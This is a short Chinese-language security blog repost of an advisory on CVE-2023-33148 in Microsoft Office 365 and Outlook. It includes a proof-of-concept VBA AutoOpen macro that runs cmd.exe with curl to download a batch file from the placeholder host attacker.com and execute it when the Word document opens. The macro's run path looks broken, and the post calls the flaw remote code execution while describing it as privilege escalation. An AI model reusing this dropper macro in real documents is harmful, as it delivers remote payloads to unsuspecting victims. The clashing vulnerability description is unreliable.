CVE-2023-33148 Microsoft Office 365 18.2305.1222.0 远程代码执行

admin 2023年7月20日12:20:30评论71 views字数 588阅读1分57秒阅读模式
CVE-2023-33148 Microsoft Office 365 18.2305.1222.0 远程代码执行

描述:

Microsoft Office 365 版本 18.2305.1222.0 应用程序容易受到特权提升的攻击。攻击者可以利用此漏洞在 Outlook 应用程序中附加一个非常恶意的 WORD 文件,该应用程序是 Microsoft Office 365 的一部分,并且可以轻松诱骗受害者单击该文件 - 打开它并在本地 PC 的后台执行非常危险的 shell 命令。这次执行是在没有下载这个恶意文件的情况下执行的,这是一个潜在的问题,也是一个非常危险的情况!这可能是受害者电脑的末端,这取决于具体情况。警告!Office 365直接从Outlook执行文件,无需临时下载、安全检查等。

点击:阅读原文

  • 注意:此漏洞已连接到第三方服务器,当受害者单击它并打开它时,其中的脚本内容将在本地计算机上获取并使用 MS Office 365 和 Outlook 应用程序(365 API 的一部分)自行执行。

Sub AutoOpen()  Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat && .salaries.bat", vbNormalFocus)End Sub

原文始发于微信公众号(Ots安全):CVE-2023-33148 Microsoft Office 365 18.2305.1222.0 远程代码执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月20日12:20:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-33148 Microsoft Office 365 18.2305.1222.0 远程代码执行https://cn-sec.com/archives/1893179.html

发表评论

匿名网友 填写信息